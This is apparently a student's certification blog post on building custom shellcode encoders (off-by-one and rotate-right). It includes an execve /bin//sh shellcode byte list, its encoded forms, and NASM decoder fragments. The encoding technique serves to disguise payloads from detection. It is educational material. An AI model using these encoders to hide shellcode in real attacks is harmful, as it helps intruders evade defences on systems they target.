The fourth assignment of the SLAE64 exam states:

  • Create a custom encoding scheme like the “insertion encoder” we showed you
  • PoC with using execve-stack as the shellcode to encode with your schema and execute

For this assignment I wrote a script that supports two encoders and can also help decode shellcode.

I wrote a simple “off-by-one” encoder which increments each byte by 0x1. It’s obviously a pun. Decoding this is simply a matter of decrementing each encountered byte by 0x1.
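To make the off-by-one scheme concrete, here is a minimal Python sketch of the encode and decode steps. It is not the actual encoder.py from my repository; the function names offbyone_encode and offbyone_decode are made up for illustration, and wrapping at the byte boundary is an assumption about how the edge case should behave.

```python
def offbyone_encode(shellcode: bytes) -> bytes:
    """Increment every byte by 1, wrapping 0xff around to 0x00."""
    return bytes((b + 1) & 0xFF for b in shellcode)


def offbyone_decode(encoded: bytes) -> bytes:
    """Decrement every byte by 1, wrapping 0x00 around to 0xff."""
    return bytes((b - 1) & 0xFF for b in encoded)


if __name__ == "__main__":
    # First four bytes of the execve-stack shellcode used in this post.
    sample = bytes([0x48, 0x31, 0xC0, 0x50])
    encoded = offbyone_encode(sample)
    print(",".join(hex(b) for b in encoded))  # prints 0x49,0x32,0xc1,0x51
    assert offbyone_decode(encoded) == sample
```

Note that with this scheme a 0xff byte in the input would encode to a null byte. The execve-stack shellcode contains no 0xff, so that does not come up here.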

The second encoder (the script calls it the shifter) rotates each byte to the right by two positions. I chose this one because it demonstrates the power of assembly: it can be decoded with a single instruction, rol.
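Since rol undoes the encoding, the encoder has to be a rotation: a plain shift would throw away the two low bits for good. The sketch below shows this in Python, which has no rotate operator, so the rotation is built from shifts and a mask. The helper names ror8, rol8, shifter_encode and shifter_decode are hypothetical and not taken from encoder.py.

```python
def ror8(value: int, count: int) -> int:
    """Rotate an 8-bit value right by count bits."""
    count %= 8
    return ((value >> count) | (value << (8 - count))) & 0xFF


def rol8(value: int, count: int) -> int:
    """Rotate an 8-bit value left by count bits."""
    count %= 8
    return ((value << count) | (value >> (8 - count))) & 0xFF


def shifter_encode(shellcode: bytes) -> bytes:
    """Encode by rotating every byte right by two positions."""
    return bytes(ror8(b, 2) for b in shellcode)


def shifter_decode(encoded: bytes) -> bytes:
    """Decode by rotating every byte left by two positions (what rol does)."""
    return bytes(rol8(b, 2) for b in encoded)


if __name__ == "__main__":
    # First four bytes of the execve-stack shellcode used in this post.
    sample = bytes([0x48, 0x31, 0xC0, 0x50])
    encoded = shifter_encode(sample)
    print(",".join(hex(b) for b in encoded))  # prints 0x12,0x4c,0x30,0x14
    assert shifter_decode(encoded) == sample
```

Because a rotation only moves bits around, every byte value round-trips, and no special case is needed for any input byte.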

Let’s generate the encoded shellcode using the two encoders:

jasper@slae64:~/exam/slae64.git/assignment-4$ python3 encoder.py  --format nasm --offbyone 0x48 0x31 0xc0 0x50 0x48 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x2f 0x73 0x68 0x53 0x48 0x89 0xe7 0x50 0x48 0x89 0xe2 0x57 0x48 0x89 0xe6 0x48 0x83 0xc0 0x3b 0x0f 0x05
0x49,0x32,0xc1,0x51,0x49,0xbc,0x30,0x63,0x6a,0x6f,0x30,0x30,0x74,0x69,0x54,0x49,0x8a,0xe8,0x51,0x49,0x8a,0xe3,0x58,0x49,0x8a,0xe7,0x49,0x84,0xc1,0x3c,0x10,0x6

and:

jasper@slae64:~/exam/slae64.git/assignment-4$ python3 encoder.py --format nasm --shifter 0x48 0x31 0xc0 0x50 0x48 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x2f 0x73 0x68 0x53 0x48 0x89 0xe7 0x50 0x48 0x89 0xe2 0x57 0x48 0x89 0xe6 0x48 0x83 0xc0 0x3b 0x0f 0x05
0x12,0x4c,0x30,0x14,0x12,0xee,0xcb,0x98,0x5a,0x9b,0xcb,0xcb,0xdc,0x1a,0xd4,0x12,0x62,0xf9,0x14,0x12,0x62,0xb8,0xd5,0x12,0x62,0xb9,0x12,0xe0,0x30,0xce,0xc3,0x41

The first decoder (off-by-one) uses the jmp-call-pop technique that was discussed in the course. This method leverages a side effect of the call instruction to locate the shellcode. So that execution can resume once a called routine returns, call pushes the address of the next instruction (the one right after the call) onto the stack. If we store our shellcode right after the call, its address ends up on the stack, where we can conveniently pop it into a register.

The second decoder (shifter) uses RIP-relative addressing, a feature of x86_64 CPUs that lets us locate the shellcode through its known offset from the instruction pointer at a given instruction. For this we use the NASM rel keyword.

Initially I used a scratch register to perform the actual decoding, but we can shrink the decoder significantly by operating directly on the byte of shellcode in memory!

So we can simply use this:

    ; ...
decoder:
    rol byte [rsi], 2
    ; ...

rather than:

    ; ...
    xor rdx, rdx
decoder:
    mov dl, byte [rsi]
    rol dl, 2
    mov byte [rsi], dl
    ; ...

Including 32 bytes of encoded shellcode, my programs come in at 54 bytes for the shifter decoder and 52 bytes for the off-by-one decoder! That leaves 22 and 20 bytes respectively for the decoder stubs themselves.

Wrapping up

I have uploaded my code to jasperla/slae64 on GitHub.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. Student ID: SLAE64-1614